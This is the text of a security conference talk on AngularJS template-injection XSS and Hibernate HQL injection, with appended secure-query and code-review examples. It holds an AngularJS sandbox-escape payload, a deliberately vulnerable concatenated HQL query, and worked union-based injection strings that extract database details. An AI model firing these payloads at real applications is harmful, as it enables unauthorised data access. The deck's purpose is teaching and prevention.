Slide 1

Advanced XSS and Injection Attacks

Slide 2

Agenda
• Introduction
• AngularJS Expressions
• AngularJS XSS
• HQL SQLi
• Prevention
• Q + A

Slide 3

Introduction
• Casey Dunham
• Security Consultant for GuidePoint Security
• Application Security
• Code Reviews
• Assessments
• OWASP Maine
• DC207
• TOOOL
@CaseyDunham @GuidePointSec

Slide 4

AngularJS Expressions

Slide 6

{{ product.name }}
{{ product.price | currency }}
Add to Cart
...

Slide 12

Versus JavaScript Expressions
• Evaluated against a scope object
• Evaluation is forgiving to undefined and null
• Filters can be used to format data before displaying it
• No Control Flow Statements
• No Function Declarations
• No RegExp Creation With Literal Notation
• No Object Creation With New Operator
• No Bitwise, Comma, And Void Operators

Slide 13

AngularJS XSS

Slide 14

Prior Research
• Gareth Heyes (PortSwigger)
• XSS without HTML: Client-Side Template Injection with AngularJS
• http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

Slide 15

Sandbox Escape

{{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//'); }}

Slide 20

DEMO

Slide 21

Hibernate Overview

Slide 22

Prior Research
• Mikhail Egorov / Sergey Soldatov
• ORM2Pwn: Exploiting Injections in Hibernate ORM (Zeronights 0x05)
• New Methods for Exploiting ORM Injections in Java Applications (HITB 2016, later this May)

Slide 23

• Renaud Dubourguais
• HQL : Hyperinsane Query Language
• Safety Symposium on Information and Communication Technologies (SSTIC) 2015

Slide 24

“Hibernate ORM (Hibernate in short) is an object-relational mapping framework for the Java language. It provides a framework for mapping an object-oriented domain model to a relational database.” - Wikipedia

Slide 25

“Hibernate's primary feature is mapping from Java classes to database tables; and mapping from Java data types to SQL data types.” - Wikipedia

Slide 27

public class Customer {
    private Long id;
    private String name;
    private String accountId;

    public Long getId() { return id; }
    public void setId(Long id) { this.id = id; }
    …
}

id  name  account_id
1   acme  acme_123
2   abc   abc_789
3   xyz   xyz_3843

Slide 28

String sql = "SELECT id, name, account_id FROM Customers WHERE account_id = ?";
PreparedStatement stmt = conn.prepareStatement(sql);
stmt.setString(1, "acme_123");
ResultSet rs = stmt.executeQuery();
Customer c = new Customer();
if (rs.next()) {
    long id = rs.getLong("id");
    c.setId(id);
    String name = rs.getString("name");
    c.setName(name);
    String accountId = rs.getString("account_id");
    c.setAccountId(accountId);
}

Slide 33

String accountId = request.getParameter("accountId");
String hql = "from Customer c where c.accountId = :accountId";
Query query = session.createQuery(hql);
query.setString("accountId", accountId);
Customer c = (Customer) query.uniqueResult();

Slide 38

@Entity
@Table(name="customer")
public class Customer {
    @Id
    @GeneratedValue(strategy=GenerationType.IDENTITY)
    private Long id;

    @Column(name="name", nullable=false)
    private String name;

    @Column(name="account_id", nullable=false)
    private String accountId;
    …
}

id  name  account_id
1   acme  acme_123
2   abc   abc_789
3   xyz   xyz_3843

Slide 39

Exploiting HQL Queries

Slide 40

Hibernate Query Language
• Similar to SQL
• Fully Object Oriented
• Uses mapped objects and their properties
• More limited than SQL

Slide 41

from Customer c where c.accountId = 'acme_123'

Mapped Object: Customer
Object Alias: c
Object Property: c.accountId

Slide 42

Can Still Be Vulnerable To Injection

public List findAllCustomersLike(String query) {
    Session session = getSession();
    String hql = "from Customer c where c.name like '%" + query + "%'";
    Query q = session.createQuery(hql);
    return (List) q.list();
}

Slide 46

Let's Fix Our Injection

String hql = "from Customer c where c.name like '%" + query + "%'";

Slide 47

Let's Fix Our Injection

String query = "' or 1=1 or ''='";
String hql = "from Customer c where c.name like '%" + query + "%'";

Slide 48

Let's Fix Our Injection

String hql = "from Customer c where c.name like '%" + "' or 1=1 or ''='" + "%'";

Slide 49

Success!

Slide 50

So Now What?
• Enumerate other columns (properties)?
• Access other mapped objects?

Slide 51

Screw that and let’s just get to the fun stuff.

Slide 52

Blind SQLi

Slide 53

HQL Injection SQL Injection

Slide 54

Escaping HQL
• In HQL the \ is a valid character (it is not an escape, so it passes through to the generated SQL)
• In HQL to escape a ' we use ''
• Can combine these to pass along our SQL Injection through HQL

Slide 56

Success!
• We can now continue along with a normal SQL Injection
• But…
• SQL needs to be valid
• HQL needs to be valid as well

Slide 57

Here’s where it gets tricky

Slide 58

String hql = "from Customer c where c.name like '%" + query + "%'";

Injection Here: the query variable

Slide 59

http://localhost/search?q=test

Slide 60

q=test' and 1='1

Slide 62

q=test' and '1\''=1 -- '='1

Slide 63

q=test' and '1\''=1 union select 1,database(),3-- '='1

Slide 65

q=test' and '1\''=1 union select 1,database(),version()-- '='1

Slide 66

w00t!

Slide 67

select customer0_.id as id1_0_, customer0_.account_id as account_2_0_, customer0_.name as name3_0_
from customers customer0_
where ( customer0_.name like '%test' ) and '1\''=1 union select 1,database(),version()-- '='1%'

Slide 68

Prevention

Slide 69

Prevention is the same as all SQL Injection

Slide 70

Don’t use String Concatenation To Build Queries!!

Slide 71

String accountId = request.getParameter("accountId");
String hql = "from Customer c where c.accountId = :accountId";
Query query = session.createQuery(hql);
query.setString("accountId", accountId);
Customer c = (Customer) query.uniqueResult();
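The same fix applied to the findAllCustomersLike method from the HQL section, with the vulnerable version kept alongside for comparison. This is an added example, not code from the talk: it assumes a Hibernate 5.2+ Session and the mapped Customer entity shown earlier, CustomerSearch is a hypothetical wrapper class, and the '!' escape character is a choice made here.

```java
import java.util.List;
import org.hibernate.Session;

// Added example, not code from the talk: the vulnerable findAllCustomersLike
// from the slides next to a hardened version that binds the search term as a
// named parameter. Assumes a Hibernate 5.2+ Session and the mapped Customer
// entity shown earlier; CustomerSearch is a hypothetical wrapper class.
public class CustomerSearch {

    private final Session session;

    public CustomerSearch(Session session) {
        this.session = session;
    }

    // VULNERABLE: the user-supplied value becomes part of the HQL text, so a
    // quote in the input changes the structure of the query that Hibernate
    // parses and of the SQL it then generates.
    public List<Customer> findAllCustomersLikeUnsafe(String query) {
        String hql = "from Customer c where c.name like '%" + query + "%'";
        return session.createQuery(hql, Customer.class).getResultList();
    }

    // HARDENED: the HQL text is a constant; the value travels as a bound
    // parameter and is never parsed as HQL or SQL.
    public List<Customer> findAllCustomersLike(String query) {
        String hql = "from Customer c where c.name like :pattern escape '!'";
        return session.createQuery(hql, Customer.class)
                .setParameter("pattern", "%" + escapeLike(query) + "%")
                .getResultList();
    }

    // Binding stops injection, but '%' and '_' in the input would still act
    // as LIKE wildcards; escape them (with the escape character declared in
    // the HQL above) so the user's text is matched literally.
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }
}
```

The wildcard escaping is a separate concern from injection: it only decides whether a user can search for "all names" by typing %, while the parameter binding is what keeps the input out of the query text. Native queries built with createSQLQuery take the same treatment, a constant SQL string plus bound parameters.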

Slide 72

• Look for calls to
• createQuery
• createSQLQuery
• All take HQL strings that could have potential for Injection.
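One way to act on this advice during a code review: list every createQuery / createSQLQuery call in a source file and flag the ones whose query string was assembled with string concatenation. This is an added example, not from the talk. HqlCallFinder is a hypothetical class written here, the SOURCE string is a constructed sample stitched together from the deck's own snippets, and the check is a line-oriented triage heuristic, not a real static analysis.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not from the talk: a code-review helper that lists every
// createQuery / createSQLQuery call in a Java source file and flags the ones
// whose query string was assembled with string concatenation. It is a triage
// heuristic (one file, one flat variable scope), not a real static analyzer.
public class HqlCallFinder {

    // "String <name> = <expression>;"  -> remember whether <expression> uses '+'
    private static final Pattern ASSIGN =
            Pattern.compile("String\\s+(\\w+)\\s*=\\s*(.+);");

    // ".createQuery(<first argument>" / ".createSQLQuery(<first argument>"
    private static final Pattern CALL =
            Pattern.compile("\\.(createQuery|createSQLQuery)\\s*\\(\\s*([^,)]+)");

    /** Returns one finding per query-creating call, with a severity label. */
    public static List<String> findings(String source) {
        Map<String, Boolean> builtByConcat = new HashMap<>();
        List<String> out = new ArrayList<>();
        String[] lines = source.split("\n");
        for (int i = 0; i < lines.length; i++) {
            Matcher assign = ASSIGN.matcher(lines[i]);
            if (assign.find()) {
                // A later assignment to the same name overwrites the earlier one.
                builtByConcat.put(assign.group(1), assign.group(2).contains("+"));
            }
            Matcher call = CALL.matcher(lines[i]);
            if (call.find()) {
                String arg = call.group(2).trim();
                boolean concat = arg.contains("+") || builtByConcat.getOrDefault(arg, false);
                out.add(String.format("line %d: %s(%s): %s", i + 1, call.group(1), arg,
                        concat ? "HIGH - query text built by concatenation"
                               : "review - confirm the string is constant and values are bound"));
            }
        }
        return out;
    }

    // Constructed sample source: the vulnerable and the parameterised lookups
    // from the slides, one after the other.
    static final String SOURCE = String.join("\n",
            "public List findAllCustomersLike(String query) {",
            "    String hql = \"from Customer c where c.name like '%\" + query + \"%'\";",
            "    Query q = session.createQuery(hql);",
            "    return (List) q.list();",
            "}",
            "public Customer findByAccountId(String accountId) {",
            "    String hql = \"from Customer c where c.accountId = :accountId\";",
            "    Query query = session.createQuery(hql);",
            "    query.setString(\"accountId\", accountId);",
            "    return (Customer) query.uniqueResult();",
            "}");

    public static void main(String[] args) {
        for (String f : findings(SOURCE)) {
            System.out.println(f);
        }
    }
}
```

Every call is reported, not only the concatenated ones, because a query string that is constant on the line where it is created may still have been built from request data somewhere else; the HIGH label only prioritises which calls to read first.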

Slide 73

Q + A

Slide 74

Thank You!

Slide 75

@CaseyDunham